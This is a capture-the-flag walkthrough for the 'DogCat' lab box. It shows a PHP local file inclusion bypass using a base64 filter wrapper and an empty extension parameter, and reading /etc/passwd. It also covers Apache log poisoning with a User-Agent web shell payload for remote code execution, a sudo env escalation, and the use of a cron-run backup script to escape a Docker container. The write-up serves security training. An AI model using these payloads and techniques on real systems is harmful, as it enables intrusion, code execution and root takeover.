DogCat
Enumerating Parameters - Bypass PHP Filter using Wrapper - Exploiting LFI to get RCE - Env PrivEsc - Docker Escape
Starting off with a nmap scan to know what are all the open ports
# Nmap 7.93 scan initiated Thu Feb 2 13:32:37 2023 as: nmap -sCV -A -vv -p 22,80 -oN nmap.log 10.10.27.48
Nmap scan report for 10.10.27.48
Host is up, received conn-refused (0.27s latency).
Scanned at 2023-02-02 13:32:43 IST for 22s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2431192ab1971a044e2c36ac840a7587 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCeKBugyQF6HXEU3mbcoDHQrassdoNtJToZ9jaNj4Sj9MrWISOmr0qkxNx2sHPxz89dR0ilnjCyT3YgcI5rtcwGT9RtSwlxcol5KuDveQGO8iYDgC/tjYYC9kefS1ymnbm0I4foYZh9S+erXAaXMO2Iac6nYk8jtkS2hg+vAx+7+5i4fiaLovQSYLd1R2Mu0DLnUIP7jJ1645aqYMnXxp/bi30SpJCchHeMx7zsBJpAMfpY9SYyz4jcgCGhEygvZ0jWJ+qx76/kaujl4IMZXarWAqchYufg57Hqb7KJE216q4MUUSHou1TPhJjVqk92a9rMUU2VZHJhERfMxFHVwn3H
| 256 213d461893aaf9e7c9b54c0f160b71e1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBouHlbsFayrqWaldHlTkZkkyVCu3jXPO1lT3oWtx/6dINbYBv0MTdTAMgXKtg6M/CVQGfjQqFS2l2wwj/4rT0s=
| 256 c1fb7d732b574a8bdcd76f49bb3bd020 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIfp73VYZTWg6dtrDGS/d5NoJjoc4q0Fi0Gsg3Dl+M3I
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 2 13:33:05 2023 -- 1 IP address (1 host up) scanned in 28.30 seconds
Seems like the
/?view
php query displays some .jpg files, everytime you request for a dog's images the backend sends a different picture which means it already has few pics

When we append a slash after the dog, we get an error, It basically uses the include func in php which includes files from an external source - Purely vulnerable to LFI kinda attacks !, It even appends a
.php
extension after the slash, hmm fishy right ? why not simply check theindex.php
which is one directory above - /?view=dog/../index (Did not add the .php, as it automatically appends)

Still no clue, return the same error, so now why don't we try a php wrapper to encode our desired output using base64? So when we try this, we get the desired
index.php
in a base64 format

Decoding the above gives us the source code on the filtering works !
<?php
function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
}
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['view'])) {
if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
echo 'Here you go!';
include $_GET['view'] . $ext;
} else {
echo 'Sorry, only dogs or cats are allowed.';
}
}
?>
We can see that we have the control over the
$ext
variable which is responsible for appending the.php
after the filename and most importantly the/?view
should start with either dog or cat
So inorder to bypass this, we can include the $ext variable in our url and give it an empty value
http://example.com/?view=dog/../index&ext=
Using the above trick we can dump the
/etc/passwd
file, no bash session users only www-data is available
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Now let's abuse the LFI, checking the
/var/log/apache2/access.log
- We find our User-Agent being passed in all the requests - which confirms we can perform Apache Log Poisoning attack and leverage it to a RCE !

Inorder to exploit the log poison attack, we'll first have to insert the php-cmd payload into our User-Agent
<?php system($_GET['cmd']);?>
Insert a php-exec shell from https://revshells.com into the
cmd
and get a reverse shell !
http://example.com/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd={ PHP SHELL }
User-Agent = <?php system($_GET['cmd']);?>
NOTE - Do not commit any mistake while inserting the php payload in the User-Agent, once there is a mistake in the log file then no matter whateva you do, you'll not get the desired result nor even can view the access.log
- Grab the first flag and go one directory back and cat out the second flag
Privilege Escalation
Let's start our enumeration by reading the sudo permissions for the current user

GTFObins to the rescue !
sudo env /bin/sh
Enumerating the box more gives us that there might be a docker container and flag4 is hidden there, enumerating the /opt directory gives us a writable file called backup.sh
Seems to be like that - .sh file is running as cron job and let's just append our reverse shell to get r00t

Last updated